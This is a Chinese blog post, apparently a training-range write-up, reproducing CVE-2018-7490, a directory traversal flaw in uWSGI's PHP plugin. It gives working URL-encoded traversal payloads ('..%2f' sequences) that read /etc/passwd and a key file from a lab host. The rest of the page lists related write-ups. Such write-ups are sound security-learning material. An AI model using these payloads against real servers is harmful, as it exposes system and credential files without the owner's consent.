uWSGI 漏洞复现(CVE-2018-7490)

最新推荐文章于 2022-11-04 10:29:02 发布
最新推荐文章于 2022-11-04 10:29:02 发布
阅读量542 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52072483/article/details/109379947
版权

CVE-2018-7490

    uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞是由于请求通过“php docroot”指定的DOCUMENT_ROOT目录下的资源时对文件路径的验证不正确造成的。
    在没有指定“PHP allowed docroot”选项的情况下,2.0.17之前的uWSGI PHP插件容易被目录遍历。
    远程攻击者可以利用此漏洞,使用路径遍历序列(“…%2f”)从易受攻击的系统中读取任意文件。

靶场
首页
目标:利用漏洞获取根目录key.txt的值

step 1:
用…/测试,…/ 被过滤,不能生效
step 2:
使用URL编码:‘ %2f ’=‘ / ’
URL:http://219.153.49.228:xxxxx/..%2f/..%2f/..%2f/etc/passwd
在这里插入图片描述
URL:http://219.153.49.228:xxxx/..%2f/..%2f/..%2f/key.txt
在这里插入图片描述

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2018-7490 uSWGI PHP遍历漏洞 vulhub复现
ANOrange的博客
06-15 660
记录vulhub靶场中CVE-2018-7490漏洞复现及小笔记
uWSGI PHP 目录遍历漏洞CVE-2018-7490
H_123s的博客
08-09 336
1.漏洞详情 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI2.0.17之前的版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有“…”序列的特殊url请求利用该漏洞查看系统上的任意文件。 2.漏洞编号 CVE-2018-7490 3.影响版本 Debian Debian_linux:8.0 Debian Debian_linux:9.0 4.启动环境 进入漏洞根目录下,编译并启动环境 docker-co.
uWSGI目录遍历(CVE-2018-7490
weixin_46801402的博客
11-04 519
uWSGI目录遍历(CVE-2018-7490
Nginx
qq_21896123的博客
09-08 424
nginx Nginx 基本概念 ngixn是什么,做什么事情 Nginx (“engine x”) 是一个高性能的 HTTP 和反向代理服务器,特点是占有内存少,并发能力强,事实上 nginx 的并发能力确实在同类型的网页服务器中表现较好,中国大陆使用 nginx 网站用户有:百度、京东、新浪、网易、腾讯、淘宝等。Nginx作为web服务器,性能是其最重要的考量,实现上非常注重效率 ,能经受高负载的考验,有报告表明能支持高达 50,000 个并发连接数。 正向代理 如果把局域网外的 Internet 想象
CVE-2018-7490 uWSGI PHP Plugin目录遍历
king丶
07-12 831
#攻击标题:uWSGI PHP Plugin目录遍历 #日期:2018年3月1日 #开发作者:Marios Nicolaides-RUNESEC #评审人:西蒙·洛伊齐德斯和尼古拉斯·马基塔尼斯-鲁内塞克 #供应商主页:https://uwsgi-docs.readthedocs.io #受影响的软件:2.0.17之前的uWSGI PHP Plugin #测试依据:uWSGI 2.0.12和2.0.15 #公司代码:CVE-2018-7490 #类别:Web应用程序 概述 ...
[漏洞复现]CVE-2018-7490(路径遍历)
volcano的博客
04-02 1899
受影响版本 uWSGI 2.0.17之前的版本 环境 https://github.com/vulhub/vulhub/blob/master/uwsgi/CVE-2018-7490 或者直接用BUUOJ里的环境 漏洞分析 uWSGI PHP Plugin < 2.0.17没能妥善处理DOCUMENT_ROOT检测的--php-docroot选项,导致攻击者可以通过带有‘…’序列的特制URL请求,恶意查看系统上的任意文件。 开始利用 打开buuoj的靶机,看到 先不使用exp里的payload,试试
uwsgi-plugin-python-2.0.16-1.el7.x86_64.rpm
12-31
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
uwsgi-2.0.18.tar.gz
07-02
uwsgi-2.0.18是uwsgi的一个版本,提供了性能优化和各种新特性。在这个tar.gz压缩包中,包含了uwsgi 2.0.18的所有源代码和相关文件,可供开发者编译安装。 对于Django项目,uwsgi是常用的服务器选项,因为它能够提供...
web2py-nginx-uwsgi-nossl-docker
06-13
【web2py-nginx-uwsgi-nossl-docker】是一个专为在Docker环境中部署web2py应用程序设计的配置方案。web2py是一个全功能的Python Web框架,支持多种数据库,提供MVC架构,内置开发环境和管理工具。本方案结合了Nginx...
uwsgi-local-dns-resolver
06-01
uWSGI-local-DNS-resolver uWSGI-local-DNS-resolver(从现在开始uWSGI-DNS )是一个 DNS 服务器,它解析每个指向 uWSGI 订阅域的请求到localhost 。 为什么? 我们的主要目的是让用户透明地连接到通过 uWSGI ...
uwsgi-alarm-socket:用于监控套接字的 uWSGI 简单插件
06-09
uwsgi-报警插座用于监控套接字的 uWSGI 简单插件只需列出要监控的地址(TCP 或 UNIX),只要与它们的连接失败,就会触发 uWSGI 警报。安装该插件是 2.x 友好的: uwsgi --build-plugin ...
uWSGI PHP目录遍历漏洞 CVE-2018-7490 漏洞复现
ADummy的博客
03-03 432
uWSGI PHP目录遍历漏洞CVE-2018-7490) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ uWSGI是一个Web应用程序服务器,它实现诸如WSGI / uwsgi / http之类的协议,并通过插件支持多种语言。 2.0.17之前的uWSGI的PHP插件无法DOCUMENT_ROOT正确检测到,导致无法DOCUMENT_ROOT通过使用读取或运行文件..%2f。 影响版本 uWSGI PHP Plugin < 2.0.17 0x 02漏洞
CVE-2018-7490实验
weixin_44281516的博客
08-03 407
打开靶场看到uWSGI可能存在CVE-2018-7490漏洞 百度搜索CVE-2018-7490发现像是任意文件读取漏洞 开始利用 读取etc/passwd
vulfocus——uWSGI 目录穿越(CVE-2018-7490)
m0_62063669的博客
09-03 569
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。但是我没并于读取到flag,然后回到phpinfo()的页面,找到了flag。能不能进行目录穿越,结果发现发现页面和url都没有改变,说明../被过滤了。../../../看。
vulhub漏洞复现系列之uwsgi(目录穿越CVE-2018-7490,unacc未授权访问)
weixin_43071873的博客
12-07 1305
前阵子和领导出差,偶然聊到渗透应该怎么学习,领导说渗透测试其实就是两块内容,一是信息收集,二是漏洞匹配。做漏洞复现呢,就是为了漏洞匹配这一块,复现的时候要留意漏洞的特征,利用条件,这才是漏洞复现的真谛吧。当然这是我个人的感觉,有其他意见还请各位大哥留言,我一定做好笔记。 前言:uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,通常被用于运行Python WEB应用。uwsgi除了是应用容器的名称之外,它和Fastcgi之类的一样,也是前端se
墨者靶场 uWSGI 漏洞复现CVE-2018-7490
曹振国的博客
06-08 1001
uWSGI 漏洞复现查看靶场提示漏洞简介受影响版本漏洞分析漏洞复现 查看靶场提示 漏洞简介 CVE-2018-7490 (PHP目录遍历漏洞uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范 受影响版本 uWSGI 2.0.17之前的版本 漏洞分析
python uwsgi+nginx部署
qq_54730385的博客
03-09 521
typora-root-url: ./ 项目环境部署 一、MySQL5.7安装 1、安装方式 1.1 方式一 yum安装(推荐使用该方式) 在CentOS中默认安装有MariaDB,这个是MySQL的分支 如果必须要安装MySQL,首先必须添加mysql社区repo通过输入命令: rpm -ivh http://dev.mysql.com/get/mysql57-community-release-el7-10.noarch.rpm 然后再yum install -y mysql-server # y.
墨者学院靶场之uWSGI漏洞复现cve-2018-7490
qq_44579646的博客
03-13 418
墨者学院靶场之uWSGI漏洞复现cve-2018-7490) 0x01 漏洞详情 uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。uWSGI2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可
wsgiserver python 漏洞_技术|PHP 、Python 等网站应用惊爆远程代理漏洞:httpoxy
weixin_39902870的博客
12-09 160
这是一个针对 PHP、Go、Python 等语言的 CGI 应用的漏洞。httpoxy是一系列影响到以 CGI 或类 CGI 方式运行的应用的漏洞名称。简单的来说,它就是一个名字空间的冲突问题。RFC 3875 (CGI)中定义了从 HTTP 请求的Proxy头部直接填充到环境变量HTTP_PROXY 的方式HTTP_PROXY是一个常用于配置外发代理的环境变量这个缺陷会导致远程攻击。如...
pip install uwsgi subprocess-exited-with-error
最新发布
06-20
`pip install uwsgi subprocess-exited-with-error` 这个命令是在使用 Python 包管理器 pip 安装两个 Python 库。具体解释如下: 1. `uwsgi`: UWSGI (Unified Web Server Gateway Interface) 是一个高性能的 Python...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值